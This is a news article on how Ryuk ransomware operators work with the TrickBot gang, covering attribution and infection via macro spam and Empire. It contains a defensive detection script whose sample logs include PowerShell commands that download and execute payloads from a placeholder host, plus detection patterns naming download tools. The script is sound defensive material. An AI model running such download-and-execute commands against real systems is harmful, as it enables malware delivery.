Which is the link between Ryuk ransomware and TrickBot?

Pierluigi Paganini January 14, 2019

FireEye and CrowdStrike discovered that threat actors behind the Ryuk ransomware are working with another cybercrime gang to gain access to target networks.

In August 2018, security experts from Check Point uncovered a ransomware-based campaign aimed at organizations around the world and attributed it to a North Korea-linked threat actor. That was the first time a security firm detected the Ryuk ransomware.

The campaign appeared targeted and well-planned: the threat actors hit several enterprises and, in each infected company, encrypted hundreds of PCs, storage systems and data centers.

Some organizations paid an exceptionally large ransom in order to retrieve the encrypted files; Check Point confirmed that the ransom amounts paid by the victims ranged from 15 BTC to 50 BTC.

At least three organizations in the United States and worldwide were severely affected, and the attackers are estimated to have already netted over $640,000 to date.

The Ryuk ransomware appears connected to Hermes malware that was associated with the notorious Lazarus APT group.

The same ransomware was recently used in an attack that disrupted newspaper distribution for several major newspapers, including the Wall Street Journal, the New York Times, and the Los Angeles Times.

Further investigation of the malware allowed experts from the security firms FireEye and CrowdStrike to discover that the threat actors behind the Ryuk ransomware are working with another cybercrime gang to gain access to target networks. They are collaborating with the threat actors behind TrickBot, malware that, once it has infected a system, creates a reverse shell back to the attackers and allows them to break into the network.

Experts at CrowdStrike believe the Ryuk ransomware is operated by a crime gang they track as GRIM SPIDER, which appears to be a cell of the Russia-based group dubbed WIZARD SPIDER that is behind TrickBot.

“GRIM SPIDER is a sophisticated eCrime group that has been operating the Ryuk ransomware since August 2018, targeting large organizations for a high-ransom return. This methodology, known as “big game hunting,” signals a shift in operations for WIZARD SPIDER, a criminal enterprise of which GRIM SPIDER appears to be a cell.” reads the report published by

“The WIZARD SPIDER threat group, known as the Russia-based operator of the TrickBot banking malware, had focused primarily on wire fraud in the past.”

FireEye is tracking the same financially-motivated activity as TEMP.MixMaster, which involved attackers using the Ryuk ransomware associated with TrickBot infections.

This suggests that TrickBot operators are adopting the crime-as-a-service model to offer access to systems they have previously compromised.

“It is important to note that TEMP.MixMaster is solely a reference to incidents where we have seen Ryuk deployed following TrickBot infections and that not all TrickBot infections will lead to the deployment of Ryuk ransomware.” reads the post published by FireEye.

“The TrickBot administrator group, which is suspected to be based in Eastern Europe, most likely provide the malware to a limited number of cyber criminal actors to use in operations,”

TrickBot is distributed through massive spam campaigns, or it can be delivered by Emotet, which is itself also distributed through malspam.

FireEye experts observed a malspam campaign in the Ryuk distribution chain that used messages pretending to be a Deloitte payroll schedule.

“Once a victim opened the attachment and enabled macros, it downloaded and executed an instance of the TrickBot malware from a remote server.” continues FireEye.

“Data obtained from FireEye technologies suggests that although different documents may have been distributed by this particular malicious spam run, the URLs from which the documents attempted to retrieve a secondary payload did not vary across attachments or recipients, despite the campaign’s broad distribution both geographically and across industry verticals.”

Attackers used the PowerShell post-exploitation toolkit called Empire to distribute payloads across the compromised network.

Empire allowed them to steal credentials for other computers in the network and then install the Ryuk ransomware on them.
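The two stages the post describes, a macro-enabled attachment that downloads a second-stage payload from a fixed URL and PowerShell-based post-exploitation on the same host, are the kind of thing a defender can look for in process-creation telemetry. The following script is an added example, not code from the article, FireEye or CrowdStrike: the log format (a Sysmon-like key=value line), the sample events, the hostnames and the `payload.invalid` URL are all constructed, and the "hidden or encoded PowerShell" heuristic is an assumption about how Empire-style launchers typically look rather than anything the post documents. It also groups events by payload URL, since FireEye noted that the URL did not vary across attachments or recipients in this spam run.

```python
"""Triage constructed process-creation events for the macro-download ->
PowerShell post-exploitation chain described above.  All names, paths,
sample events and heuristics here are assumptions made for this example."""
import re
from collections import defaultdict

# Constructed sample events (Sysmon-like key=value text, not real telemetry).
# The base64 after -enc is a placeholder, not a decodable payload.
SAMPLE_LOG = """\
host=WS01 parent=C:\\Program Files\\Microsoft Office\\WINWORD.EXE image=C:\\Windows\\System32\\cmd.exe cmdline="cmd /c powershell -w hidden (New-Object Net.WebClient).DownloadFile('http://payload.invalid/doc1.exe','C:\\Temp\\x.exe')"
host=WS01 parent=C:\\Windows\\System32\\cmd.exe image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline="powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"
host=WS02 parent=C:\\Program Files\\Microsoft Office\\WINWORD.EXE image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline="powershell IEX (New-Object Net.WebClient).DownloadString('http://payload.invalid/doc1.exe')"
host=WS03 parent=C:\\Windows\\explorer.exe image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline="powershell -File C:\\scripts\\inventory.ps1"
host=WS04 parent=C:\\Program Files\\Microsoft Office\\EXCEL.EXE image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline="powershell Get-Date"
"""

EVENT_RE = re.compile(
    r'^host=(?P<host>\S+) parent=(?P<parent>.+?) image=(?P<image>.+?) cmdline="(?P<cmdline>.*)"$'
)
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Download-cradle keywords: the macro stage fetching a second-stage binary.
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|bitsadmin|certutil", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
# Assumed launcher traits (encoded command, hidden window, no profile); the
# article does not give Empire's exact command lines, so tune for your data.
ENCODED_RE = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s", re.I)
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b|-noni\b", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(text):
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:  # lines that do not fit the expected shape are skipped
            events.append(m.groupdict())
    return events


def classify(ev):
    """Return the rule names a single event triggers (possibly none)."""
    rules = []
    parent, image, cmd = basename(ev["parent"]), basename(ev["image"]), ev["cmdline"]
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        # Office spawning a script host is odd on its own; with a download
        # cradle it matches the macro-to-payload step described in the post.
        rules.append("office_download_cradle" if DOWNLOAD_RE.search(cmd)
                     else "office_spawned_script_host")
    if image == "powershell.exe" and (ENCODED_RE.search(cmd) or HIDDEN_RE.search(cmd)):
        rules.append("hidden_or_encoded_powershell")
    return rules


def triage(text):
    findings, by_host, urls = [], defaultdict(set), defaultdict(set)
    for ev in parse_events(text):
        for rule in classify(ev):
            findings.append((ev["host"], rule, ev["cmdline"]))
            by_host[ev["host"]].add(rule)
        for url in URL_RE.findall(ev["cmdline"]):
            urls[url].add(ev["host"])
    # A host showing both the macro download stage and a post-exploitation
    # style PowerShell launch is flagged as a probable full chain.
    chains = sorted(h for h, r in by_host.items()
                    if "office_download_cradle" in r and "hidden_or_encoded_powershell" in r)
    return {
        "findings": findings,
        "chains": chains,
        # One payload URL reached from many hosts points at a single spam run.
        "payload_urls": {u: sorted(h) for u, h in urls.items()},
    }


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for host, rule, cmd in result["findings"]:
        print(f"{host}: {rule}: {cmd[:70]}")
    print("chains:", result["chains"])
    print("payload URLs:", result["payload_urls"])
```

On the constructed sample, WS01 is reported as a full chain (Word spawning a download cradle, then hidden encoded PowerShell), WS02 shows only the download stage, WS04's Excel-to-PowerShell spawn is flagged at lower confidence, and the shared payload URL is listed against both infected hosts. The per-host correlation is deliberately loose (no time window) so it runs over a flat text extract; in a SIEM you would bound it to the dwell time you expect between the macro stage and post-exploitation.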

The investigations conducted by FireEye, CrowdStrike and McAfee seem to rule out an association between Ryuk and North Korea; the experts believe the threat actors behind the ransomware are based in Russia.

According to McAfee, the initial attribution to North Korea might be wrong because it was based only on the code similarities between Ryuk and Hermes. The experts pointed out that in August 2017 the Hermes ransomware was being sold online on Exploit.in by a Russian-speaking actor.

The Lazarus Group likely bought the ransomware and used it in its operations to complicate attribution.


Pierluigi Paganini

(SecurityAffairs – hacking, Ryuk ransomware)
